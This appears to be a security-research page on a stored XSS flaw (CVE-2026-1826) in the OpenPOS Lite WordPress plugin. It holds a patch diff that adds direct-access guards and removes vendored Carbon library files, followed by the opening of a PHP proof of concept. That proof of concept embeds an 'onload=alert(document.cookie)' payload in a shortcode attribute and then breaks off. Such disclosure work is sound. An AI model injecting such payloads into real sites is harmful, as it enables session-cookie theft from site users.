AM","state":"new","order_state":"","online_payment":false,"print_invoice":false,"point_discount":[],"add_discount":false,"add_shipping":false,"add_tax":false,"custom_tax_rate":0,"custom_tax_rates":[],"tax_details":[{"code":"standard_1","rate":21,"shipping":"yes","compound":"no","rate_id":1,"label":"Tax","total":3.47}],"discount_tax_details":[],"source":{},"source_type":"","available_shipping_methods":[],"mode":"incl_tax","is_takeaway":true,"sync_status":0,"addition_information":{},"email_receipt":"no","checkout_guide":"","privacy_accept":"yes","created_at_time":1585542671673,"order_id":518,"refunds":[],"exchanges":[],"refund_total":0}';
-    //$order_data = json_decode($json,true);
-?>
+<?php if ( ! defined( 'ABSPATH' ) ) exit; ?>
 <!DOCTYPE html>
 <html>
 <head>
--- a/wpos-lite-version/templates/front/session_customer_checkout.php
+++ b/wpos-lite-version/templates/front/session_customer_checkout.php
@@ -1 +1,3 @@
-sadfsa fasdfa dfsadf
 No newline at end of file
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 No newline at end of file
--- a/wpos-lite-version/templates/help.php
+++ b/wpos-lite-version/templates/help.php
@@ -1,3 +1,6 @@
+<?php
+if ( ! defined( 'ABSPATH' ) ) exit;
+?>
 <html>
     <body>
         <h2><?php echo __('Hot Keys','wpos-lite');?></h2>
--- a/wpos-lite-version/templates/short_code_inventory.php
+++ b/wpos-lite-version/templates/short_code_inventory.php
@@ -1,4 +1,5 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) exit;
 global $op_warehouses;
 ?>
 <table class="warehouse-inventory-list">
--- a/wpos-lite-version/vendor/composer/installed.php
+++ b/wpos-lite-version/vendor/composer/installed.php
@@ -5,7 +5,7 @@
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
-        'reference' => '7fee99a5918e32fc188bac15f22f6cc0005d32b8',
+        'reference' => '774524facbdaa483560113749a13f41f23905a84',
         'name' => '__root__',
         'dev' => true,
     ),
@@ -16,7 +16,7 @@
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
-            'reference' => '7fee99a5918e32fc188bac15f22f6cc0005d32b8',
+            'reference' => '774524facbdaa483560113749a13f41f23905a84',
             'dev_requirement' => false,
         ),
         'carbonphp/carbon-doctrine-types' => array(
--- a/wpos-lite-version/vendor/nesbot/carbon/.phpstorm.meta.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/.phpstorm.meta.php
@@ -1,10 +0,0 @@
-<?php
-namespace PHPSTORM_META {
-    registerArgumentsSet("date_units", "millenania", "millennium", "century", "centuries", "decade", "decades", "year", "years", "y", "yr", "yrs", "quarter", "quarters", "month", "months", "mo", "mos", "week", "weeks", "w", "day", "days", "d", "hour", "hours", "h", "minute", "minutes", "m", "second", "seconds", "s", "millisecond", "milliseconds", "milli", "ms", "microsecond", "microseconds", "micro", "µs");
-    expectedArguments(CarbonTraitsUnits::add(), 0, argumentsSet("date_units"));
-    expectedArguments(CarbonTraitsUnits::add(), 1, argumentsSet("date_units"));
-    expectedArguments(CarbonCarbonInterface::add(), 0, argumentsSet("date_units"));
-    expectedArguments(CarbonCarbonInterface::add(), 1, argumentsSet("date_units"));
-
-    expectedArguments(CarbonCarbonInterface::getTimeFormatByPrecision(), 0, "minute", "second", "m", "millisecond", "µ", "microsecond", "minutes", "seconds", "ms", "milliseconds", "µs", "microseconds");
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/MessageFormatter/MessageFormatterMapperStrongType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/MessageFormatter/MessageFormatterMapperStrongType.php
@@ -1,28 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonMessageFormatter;
-
-use SymfonyComponentTranslationFormatterMessageFormatterInterface;
-
-if (!class_exists(LazyMessageFormatter::class, false)) {
-    abstract class LazyMessageFormatter implements MessageFormatterInterface
-    {
-        public function format(string $message, string $locale, array $parameters = []): string
-        {
-            return $this->formatter->format(
-                $message,
-                $this->transformLocale($locale),
-                $parameters
-            );
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/MessageFormatter/MessageFormatterMapperWeakType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/MessageFormatter/MessageFormatterMapperWeakType.php
@@ -1,36 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonMessageFormatter;
-
-use SymfonyComponentTranslationFormatterChoiceMessageFormatterInterface;
-use SymfonyComponentTranslationFormatterMessageFormatterInterface;
-
-if (!class_exists(LazyMessageFormatter::class, false)) {
-    abstract class LazyMessageFormatter implements MessageFormatterInterface, ChoiceMessageFormatterInterface
-    {
-        abstract protected function transformLocale(?string $locale): ?string;
-
-        public function format($message, $locale, array $parameters = [])
-        {
-            return $this->formatter->format(
-                $message,
-                $this->transformLocale($locale),
-                $parameters
-            );
-        }
-
-        public function choiceFormat($message, $number, $locale, array $parameters = [])
-        {
-            return $this->formatter->choiceFormat($message, $number, $locale, $parameters);
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/AbstractMacroBuiltin.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/AbstractMacroBuiltin.php
@@ -1,36 +0,0 @@
-<?php
-
-declare(strict_types=1);
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonPHPStan;
-
-use PHPStanBetterReflectionReflection;
-use ReflectionMethod;
-
-if (!class_exists(AbstractReflectionMacro::class, false)) {
-    abstract class AbstractReflectionMacro extends AbstractMacro
-    {
-        /**
-         * {@inheritdoc}
-         */
-        public function getReflection(): ?ReflectionMethod
-        {
-            if ($this->reflectionFunction instanceof ReflectionReflectionMethod) {
-                return new ReflectionAdapterReflectionMethod($this->reflectionFunction);
-            }
-
-            return $this->reflectionFunction instanceof ReflectionMethod
-                ? $this->reflectionFunction
-                : null;
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/AbstractMacroStatic.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/AbstractMacroStatic.php
@@ -1,45 +0,0 @@
-<?php
-
-declare(strict_types=1);
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonPHPStan;
-
-use PHPStanBetterReflectionReflection;
-use ReflectionMethod;
-
-if (!class_exists(AbstractReflectionMacro::class, false)) {
-    abstract class AbstractReflectionMacro extends AbstractMacro
-    {
-        /**
-         * {@inheritdoc}
-         */
-        public function getReflection(): ?ReflectionAdapterReflectionMethod
-        {
-            if ($this->reflectionFunction instanceof ReflectionAdapterReflectionMethod) {
-                return $this->reflectionFunction;
-            }
-
-            if ($this->reflectionFunction instanceof ReflectionReflectionMethod) {
-                return new ReflectionAdapterReflectionMethod($this->reflectionFunction);
-            }
-
-            return $this->reflectionFunction instanceof ReflectionMethod
-                ? new ReflectionAdapterReflectionMethod(
-                    ReflectionReflectionMethod::createFromName(
-                        $this->reflectionFunction->getDeclaringClass()->getName(),
-                        $this->reflectionFunction->getName()
-                    )
-                )
-                : null;
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/MacroStrongType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/MacroStrongType.php
@@ -1,45 +0,0 @@
-<?php
-
-declare(strict_types=1);
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonPHPStan;
-
-if (!class_exists(LazyMacro::class, false)) {
-    abstract class LazyMacro extends AbstractReflectionMacro
-    {
-        /**
-         * {@inheritdoc}
-         */
-        public function getFileName(): ?string
-        {
-            $file = $this->reflectionFunction->getFileName();
-
-            return (($file ? realpath($file) : null) ?: $file) ?: null;
-        }
-
-        /**
-         * {@inheritdoc}
-         */
-        public function getStartLine(): ?int
-        {
-            return $this->reflectionFunction->getStartLine();
-        }
-
-        /**
-         * {@inheritdoc}
-         */
-        public function getEndLine(): ?int
-        {
-            return $this->reflectionFunction->getEndLine();
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/MacroWeakType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/PHPStan/MacroWeakType.php
@@ -1,51 +0,0 @@
-<?php
-
-declare(strict_types=1);
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace CarbonPHPStan;
-
-if (!class_exists(LazyMacro::class, false)) {
-    abstract class LazyMacro extends AbstractReflectionMacro
-    {
-        /**
-         * {@inheritdoc}
-         *
-         * @return string|false
-         */
-        public function getFileName()
-        {
-            $file = $this->reflectionFunction->getFileName();
-
-            return (($file ? realpath($file) : null) ?: $file) ?: null;
-        }
-
-        /**
-         * {@inheritdoc}
-         *
-         * @return int|false
-         */
-        public function getStartLine()
-        {
-            return $this->reflectionFunction->getStartLine();
-        }
-
-        /**
-         * {@inheritdoc}
-         *
-         * @return int|false
-         */
-        public function getEndLine()
-        {
-            return $this->reflectionFunction->getEndLine();
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/TranslatorStrongType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/TranslatorStrongType.php
@@ -1,52 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace Carbon;
-
-use SymfonyComponentTranslationMessageCatalogueInterface;
-
-if (!class_exists(LazyTranslator::class, false)) {
-    class LazyTranslator extends AbstractTranslator implements TranslatorStrongTypeInterface
-    {
-        public function trans(?string $id, array $parameters = [], ?string $domain = null, ?string $locale = null): string
-        {
-            return $this->translate($id, $parameters, $domain, $locale);
-        }
-
-        public function getFromCatalogue(MessageCatalogueInterface $catalogue, string $id, string $domain = 'messages')
-        {
-            $messages = $this->getPrivateProperty($catalogue, 'messages');
-
-            if (isset($messages[$domain.MessageCatalogueInterface::INTL_DOMAIN_SUFFIX][$id])) {
-                return $messages[$domain.MessageCatalogueInterface::INTL_DOMAIN_SUFFIX][$id];
-            }
-
-            if (isset($messages[$domain][$id])) {
-                return $messages[$domain][$id];
-            }
-
-            $fallbackCatalogue = $this->getPrivateProperty($catalogue, 'fallbackCatalogue');
-
-            if ($fallbackCatalogue !== null) {
-                return $this->getFromCatalogue($fallbackCatalogue, $id, $domain);
-            }
-
-            return $id;
-        }
-
-        private function getPrivateProperty($instance, string $field)
-        {
-            return (function (string $field) {
-                return $this->$field;
-            })->call($instance, $field);
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/TranslatorWeakType.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/lazy/Carbon/TranslatorWeakType.php
@@ -1,32 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace Carbon;
-
-if (!class_exists(LazyTranslator::class, false)) {
-    class LazyTranslator extends AbstractTranslator
-    {
-        /**
-         * Returns the translation.
-         *
-         * @param string|null $id
-         * @param array       $parameters
-         * @param string|null $domain
-         * @param string|null $locale
-         *
-         * @return string
-         */
-        public function trans($id, array $parameters = [], $domain = null, $locale = null)
-        {
-            return $this->translate($id, $parameters, $domain, $locale);
-        }
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/sponsors.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/sponsors.php
@@ -1,129 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-use CarbonCarbonImmutable;
-
-require_once __DIR__.'/vendor/autoload.php';
-
-function getMaxHistoryMonthsByAmount($amount): int
-{
-    if ($amount >= 50) {
-        return 6;
-    }
-
-    if ($amount >= 20) {
-        return 4;
-    }
-
-    return 2;
-}
-
-function getHtmlAttribute($rawValue): string
-{
-    return str_replace(
-        ['', "r"],
-        '',
-        trim(htmlspecialchars((string) $rawValue), "  nrtv"),
-    );
-}
-
-function getOpenCollectiveSponsors(): string
-{
-    $customSponsorImages = [
-        // For consistency and equity among sponsors, as of now, we kindly ask our sponsors
-        // to provide an image having a width/height ratio between 1/1 and 2/1.
-        // By default, we'll show the member picture from OpenCollective, and will resize it if bigger
-        // int(OpenCollective.MemberId) => ImageURL
-    ];
-
-    $members = json_decode(file_get_contents('https://opencollective.com/carbon/members/all.json'), true);
-
-    $list = array_filter($members, static function ($member): bool {
-        return ($member['lastTransactionAmount'] > 3 || $member['isActive']) &&
-            $member['role'] === 'BACKER' &&
-            $member['type'] !== 'USER' &&
-            (
-                $member['totalAmountDonated'] > 100 ||
-                $member['lastTransactionAt'] > CarbonImmutable::now()
-                    ->subMonthsNoOverflow(getMaxHistoryMonthsByAmount($member['lastTransactionAmount']))
-                    ->format('Y-m-d h:i') ||
-                $member['isActive'] && $member['lastTransactionAmount'] >= 30
-            );
-    });
-
-    $list = array_map(static function (array $member): array {
-        $createdAt = CarbonImmutable::parse($member['createdAt']);
-        $lastTransactionAt = CarbonImmutable::parse($member['lastTransactionAt']);
-
-        if ($createdAt->format('d H:i:s.u') > $lastTransactionAt->format('d H:i:s.u')) {
-            $createdAt = $createdAt
-                ->setDay($lastTransactionAt->day)
-                ->modify($lastTransactionAt->format('H:i:s.u'));
-        }
-
-        $monthlyContribution = (float) ($member['totalAmountDonated'] / ceil($createdAt->floatDiffInMonths()));
-
-        if (
-            $lastTransactionAt->isAfter('last month') &&
-            $member['lastTransactionAmount'] > $monthlyContribution
-        ) {
-            $monthlyContribution = (float) $member['lastTransactionAmount'];
-        }
-
-        $yearlyContribution = (float) ($member['totalAmountDonated'] / max(1, $createdAt->floatDiffInYears()));
-        $status = null;
-
-        if ($monthlyContribution > 29) {
-            $status = 'sponsor';
-        } elseif ($monthlyContribution > 4.5 || $yearlyContribution > 29) {
-            $status = 'backer';
-        } elseif ($member['totalAmountDonated'] > 0) {
-            $status = 'helper';
-        }
-
-        return array_merge($member, [
-            'star' => ($monthlyContribution > 98 || $yearlyContribution > 500),
-            'status' => $status,
-            'monthlyContribution' => $monthlyContribution,
-            'yearlyContribution' => $yearlyContribution,
-        ]);
-    }, $list);
-
-    usort($list, static function (array $a, array $b): int {
-        return ($b['monthlyContribution'] <=> $a['monthlyContribution'])
-            ?: ($b['totalAmountDonated'] <=> $a['totalAmountDonated']);
-    });
-
-    return implode('', array_map(static function (array $member) use ($customSponsorImages): string {
-        $href = htmlspecialchars($member['website'] ?? $member['profile']);
-        $src = $customSponsorImages[$member['MemberId'] ?? ''] ?? $member['image'] ?? (strtr($member['profile'], ['https://opencollective.com/' => 'https://images.opencollective.com/']).'/avatar/256.png');
-        [$x, $y] = @getimagesize($src) ?: [0, 0];
-        $validImage = ($x && $y);
-        $src = $validImage ? htmlspecialchars($src) : 'https://opencollective.com/static/images/default-guest-logo.svg';
-        $height = $member['status'] === 'sponsor' ? 64 : 42;
-        $width = min($height * 2, $validImage ? round($x * $height / $y) : $height);
-        $href .= (strpos($href, '?') === false ? '?' : '&').'utm_source=opencollective&utm_medium=github&utm_campaign=Carbon';
-        $title = getHtmlAttribute(($member['description'] ?? null) ?: $member['name']);
-        $alt = getHtmlAttribute($member['name']);
-
-        return "n".'<a title="'.$title.'" href="'.$href.'" target="_blank">'.
-            '<img alt="'.$alt.'" src="'.$src.'" width="'.$width.'" height="'.$height.'">'.
-            '</a>';
-    }, $list))."n";
-}
-
-file_put_contents('readme.md', preg_replace_callback(
-    '/(<!-- <open-collective-sponsors> -->)[sS]+(<!-- </open-collective-sponsors> -->)/',
-    static function (array $match): string {
-        return $match[1].getOpenCollectiveSponsors().$match[2];
-    },
-    file_get_contents('readme.md')
-));
--- a/wpos-lite-version/vendor/nesbot/carbon/src/Carbon/AbstractTranslator.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/src/Carbon/AbstractTranslator.php
@@ -1,400 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace Carbon;
-
-use CarbonMessageFormatterMessageFormatterMapper;
-use Closure;
-use ReflectionException;
-use ReflectionFunction;
-use SymfonyComponentTranslation;
-use SymfonyComponentTranslationFormatterMessageFormatterInterface;
-use SymfonyComponentTranslationLoaderArrayLoader;
-
-abstract class AbstractTranslator extends TranslationTranslator
-{
-    /**
-     * Translator singletons for each language.
-     *
-     * @var array
-     */
-    protected static $singletons = [];
-
-    /**
-     * List of custom localized messages.
-     *
-     * @var array
-     */
-    protected $messages = [];
-
-    /**
-     * List of custom directories that contain translation files.
-     *
-     * @var string[]
-     */
-    protected $directories = [];
-
-    /**
-     * Set to true while constructing.
-     *
-     * @var bool
-     */
-    protected $initializing = false;
-
-    /**
-     * List of locales aliases.
-     *
-     * @var array<string, string>
-     */
-    protected $aliases = [
-        'me' => 'sr_Latn_ME',
-        'scr' => 'sh',
-    ];
-
-    /**
-     * Return a singleton instance of Translator.
-     *
-     * @param string|null $locale optional initial locale ("en" - english by default)
-     *
-     * @return static
-     */
-    public static function get($locale = null)
-    {
-        $locale = $locale ?: 'en';
-        $key = static::class === Translator::class ? $locale : static::class.'|'.$locale;
-
-        if (!isset(static::$singletons[$key])) {
-            static::$singletons[$key] = new static($locale);
-        }
-
-        return static::$singletons[$key];
-    }
-
-    public function __construct($locale, ?MessageFormatterInterface $formatter = null, $cacheDir = null, $debug = false)
-    {
-        parent::setLocale($locale);
-        $this->initializing = true;
-        $this->directories = [__DIR__.'/Lang'];
-        $this->addLoader('array', new ArrayLoader());
-        parent::__construct($locale, new MessageFormatterMapper($formatter), $cacheDir, $debug);
-        $this->initializing = false;
-    }
-
-    /**
-     * Returns the list of directories translation files are searched in.
-     *
-     * @return array
-     */
-    public function getDirectories(): array
-    {
-        return $this->directories;
-    }
-
-    /**
-     * Set list of directories translation files are searched in.
-     *
-     * @param array $directories new directories list
-     *
-     * @return $this
-     */
-    public function setDirectories(array $directories)
-    {
-        $this->directories = $directories;
-
-        return $this;
-    }
-
-    /**
-     * Add a directory to the list translation files are searched in.
-     *
-     * @param string $directory new directory
-     *
-     * @return $this
-     */
-    public function addDirectory(string $directory)
-    {
-        $this->directories[] = $directory;
-
-        return $this;
-    }
-
-    /**
-     * Remove a directory from the list translation files are searched in.
-     *
-     * @param string $directory directory path
-     *
-     * @return $this
-     */
-    public function removeDirectory(string $directory)
-    {
-        $search = rtrim(strtr($directory, '\', '/'), '/');
-
-        return $this->setDirectories(array_filter($this->getDirectories(), function ($item) use ($search) {
-            return rtrim(strtr($item, '\', '/'), '/') !== $search;
-        }));
-    }
-
-    /**
-     * Reset messages of a locale (all locale if no locale passed).
-     * Remove custom messages and reload initial messages from matching
-     * file in Lang directory.
-     *
-     * @param string|null $locale
-     *
-     * @return bool
-     */
-    public function resetMessages($locale = null)
-    {
-        if ($locale === null) {
-            $this->messages = [];
-
-            return true;
-        }
-
-        $this->assertValidLocale($locale);
-
-        foreach ($this->getDirectories() as $directory) {
-            $data = @include sprintf('%s/%s.php', rtrim($directory, '\/'), $locale);
-
-            if ($data !== false) {
-                $this->messages[$locale] = $data;
-                $this->addResource('array', $this->messages[$locale], $locale);
-
-                return true;
-            }
-        }
-
-        return false;
-    }
-
-    /**
-     * Returns the list of files matching a given locale prefix (or all if empty).
-     *
-     * @param string $prefix prefix required to filter result
-     *
-     * @return array
-     */
-    public function getLocalesFiles($prefix = '')
-    {
-        $files = [];
-
-        foreach ($this->getDirectories() as $directory) {
-            $directory = rtrim($directory, '\/');
-
-            foreach (glob("$directory/$prefix*.php") as $file) {
-                $files[] = $file;
-            }
-        }
-
-        return array_unique($files);
-    }
-
-    /**
-     * Returns the list of internally available locales and already loaded custom locales.
-     * (It will ignore custom translator dynamic loading.)
-     *
-     * @param string $prefix prefix required to filter result
-     *
-     * @return array
-     */
-    public function getAvailableLocales($prefix = '')
-    {
-        $locales = [];
-        foreach ($this->getLocalesFiles($prefix) as $file) {
-            $locales[] = substr($file, strrpos($file, '/') + 1, -4);
-        }
-
-        return array_unique(array_merge($locales, array_keys($this->messages)));
-    }
-
-    protected function translate(?string $id, array $parameters = [], ?string $domain = null, ?string $locale = null): string
-    {
-        if ($domain === null) {
-            $domain = 'messages';
-        }
-
-        $catalogue = $this->getCatalogue($locale);
-        $format = $this instanceof TranslatorStrongTypeInterface
-            ? $this->getFromCatalogue($catalogue, (string) $id, $domain)
-            : $this->getCatalogue($locale)->get((string) $id, $domain); // @codeCoverageIgnore
-
-        if ($format instanceof Closure) {
-            // @codeCoverageIgnoreStart
-            try {
-                $count = (new ReflectionFunction($format))->getNumberOfRequiredParameters();
-            } catch (ReflectionException $exception) {
-                $count = 0;
-            }
-            // @codeCoverageIgnoreEnd
-
-            return $format(
-                ...array_values($parameters),
-                ...array_fill(0, max(0, $count - count($parameters)), null)
-            );
-        }
-
-        return parent::trans($id, $parameters, $domain, $locale);
-    }
-
-    /**
-     * Init messages language from matching file in Lang directory.
-     *
-     * @param string $locale
-     *
-     * @return bool
-     */
-    protected function loadMessagesFromFile($locale)
-    {
-        return isset($this->messages[$locale]) || $this->resetMessages($locale);
-    }
-
-    /**
-     * Set messages of a locale and take file first if present.
-     *
-     * @param string $locale
-     * @param array  $messages
-     *
-     * @return $this
-     */
-    public function setMessages($locale, $messages)
-    {
-        $this->loadMessagesFromFile($locale);
-        $this->addResource('array', $messages, $locale);
-        $this->messages[$locale] = array_merge(
-            $this->messages[$locale] ?? [],
-            $messages
-        );
-
-        return $this;
-    }
-
-    /**
-     * Set messages of the current locale and take file first if present.
-     *
-     * @param array $messages
-     *
-     * @return $this
-     */
-    public function setTranslations($messages)
-    {
-        return $this->setMessages($this->getLocale(), $messages);
-    }
-
-    /**
-     * Get messages of a locale, if none given, return all the
-     * languages.
-     *
-     * @param string|null $locale
-     *
-     * @return array
-     */
-    public function getMessages($locale = null)
-    {
-        return $locale === null ? $this->messages : $this->messages[$locale];
-    }
-
-    /**
-     * Set the current translator locale and indicate if the source locale file exists
-     *
-     * @param string $locale locale ex. en
-     *
-     * @return bool
-     */
-    public function setLocale($locale)
-    {
-        $locale = preg_replace_callback('/[-_]([a-z]{2,}|d{2,})/', function ($matches) {
-            // _2-letters or YUE is a region, _3+-letters is a variant
-            $upper = strtoupper($matches[1]);
-
-            if ($upper === 'YUE' || $upper === 'ISO' || strlen($upper) < 3) {
-                return "_$upper";
-            }
-
-            return '_'.ucfirst($matches[1]);
-        }, strtolower($locale));
-
-        $previousLocale = $this->getLocale();
-
-        if ($previousLocale === $locale && isset($this->messages[$locale])) {
-            return true;
-        }
-
-        unset(static::$singletons[$previousLocale]);
-
-        if ($locale === 'auto') {
-            $completeLocale = setlocale(LC_TIME, '0');
-            $locale = preg_replace('/^([^_.-]+).*$/', '$1', $completeLocale);
-            $locales = $this->getAvailableLocales($locale);
-
-            $completeLocaleChunks = preg_split('/[_.-]+/', $completeLocale);
-
-            $getScore = function ($language) use ($completeLocaleChunks) {
-                return self::compareChunkLists($completeLocaleChunks, preg_split('/[_.-]+/', $language));
-            };
-
-            usort($locales, function ($first, $second) use ($getScore) {
-                return $getScore($second) <=> $getScore($first);
-            });
-
-            $locale = $locales[0];
-        }
-
-        if (isset($this->aliases[$locale])) {
-            $locale = $this->aliases[$locale];
-        }
-
-        // If subtag (ex: en_CA) first load the macro (ex: en) to have a fallback
-        if (str_contains($locale, '_') &&
-            $this->loadMessagesFromFile($macroLocale = preg_replace('/^([^_]+).*$/', '$1', $locale))
-        ) {
-            parent::setLocale($macroLocale);
-        }
-
-        if (!$this->loadMessagesFromFile($locale) && !$this->initializing) {
-            return false;
-        }
-
-        parent::setLocale($locale);
-
-        return true;
-    }
-
-    /**
-     * Show locale on var_dump().
-     *
-     * @return array
-     */
-    public function __debugInfo()
-    {
-        return [
-            'locale' => $this->getLocale(),
-        ];
-    }
-
-    private static function compareChunkLists($referenceChunks, $chunks)
-    {
-        $score = 0;
-
-        foreach ($referenceChunks as $index => $chunk) {
-            if (!isset($chunks[$index])) {
-                $score++;
-
-                continue;
-            }
-
-            if (strtolower($chunks[$index]) === strtolower($chunk)) {
-                $score += 10;
-            }
-        }
-
-        return $score;
-    }
-}
--- a/wpos-lite-version/vendor/nesbot/carbon/src/Carbon/Carbon.php
+++ b/wpos-lite-version/vendor/nesbot/carbon/src/Carbon/Carbon.php
@@ -1,523 +0,0 @@
-<?php
-
-/**
- * This file is part of the Carbon package.
- *
- * (c) Brian Nesbitt <brian@nesbot.com>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace Carbon;
-
-use CarbonTraitsDate;
-use CarbonTraitsDeprecatedProperties;
-use DateTime;
-use DateTimeInterface;
-use DateTimeZone;
-
-/**
- * A simple API extension for DateTime.
- *
- * @mixin DeprecatedProperties
- *
- * <autodoc generated by `composer phpdoc`>
- *
- * @property      int                 $year
- * @property      int                 $yearIso
- * @property      int                 $month
- * @property      int                 $day
- * @property      int                 $hour
- * @property      int                 $minute
- * @property      int                 $second
- * @property      int                 $micro
- * @property      int                 $microsecond
- * @property      int|float|string    $timestamp                                                                                      seconds since the Unix Epoch
- * @property      string              $englishDayOfWeek                                                                               the day of week in English
- * @property      string              $shortEnglishDayOfWeek                                                                          the abbreviated day of week in English
- * @property      string              $englishMonth                                                                                   the month in English
- * @property      string              $shortEnglishMonth                                                                              the abbreviated month in English
- * @property      int                 $milliseconds
- * @property      int                 $millisecond
- * @property      int                 $milli
- * @property      int                 $week                                                                                           1 through 53
- * @property      int                 $isoWeek                                                                                        1 through 53
- * @property      int                 $weekYear                                                                                       year according to week format
- * @property      int                 $isoWeekYear                                                                                    year according to ISO week format
- * @property      int                 $dayOfYear                                                                                      1 through 366
- * @property      int                 $age                                                                                            does a diffInYears() with default parameters
- * @property      int                 $offset                                                                                         the timezone offset in seconds from UTC
- * @property      int                 $offsetMinutes                                                                                  the timezone offset in minutes from UTC
- * @property      int                 $offsetHours                                                                                    the timezone offset in hours from UTC
- * @property      CarbonTimeZone      $timezone                                                                                       the current timezone
- * @property      CarbonTimeZone      $tz                                                                                             alias of $timezone
- * @property-read int                 $dayOfWeek                                                                                      0 (for Sunday) through 6 (for Saturday)
- * @property-read int                 $dayOfWeekIso                                                                                   1 (for Monday) through 7 (for Sunday)
- * @property-read int                 $weekOfYear                                                                                     ISO-8601 week number of year, weeks starting on Monday
- * @property-read int                 $daysInMonth                                                                                    number of days in the given month
- * @property-read string              $latinMeridiem                                                                                  "am"/"pm" (Ante meridiem or Post meridiem latin lowercase mark)
- * @property-read string              $latinUpperMeridiem                                                                             "AM"/"PM" (Ante meridiem or Post meridiem latin uppercase mark)
- * @property-read string              $timezoneAbbreviatedName                                                                        the current timezone abbreviated name
- * @property-read string              $tzAbbrName                                                                                     alias of $timezoneAbbreviatedName
- * @property-read string              $dayName

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1826 - OpenPOS Lite <= 3.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

<?php
/**
 * Proof of Concept for CVE-2026-1826
 * Demonstrates stored XSS via OpenPOS Lite order_qrcode shortcode width attribute
 * Requires Contributor-level WordPress credentials
 */

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// XSS payload in width attribute - executes JavaScript alert when page loads
$malicious_shortcode = '[order_qrcode width="100px" onload="alert(document.cookie)" height="100"]';

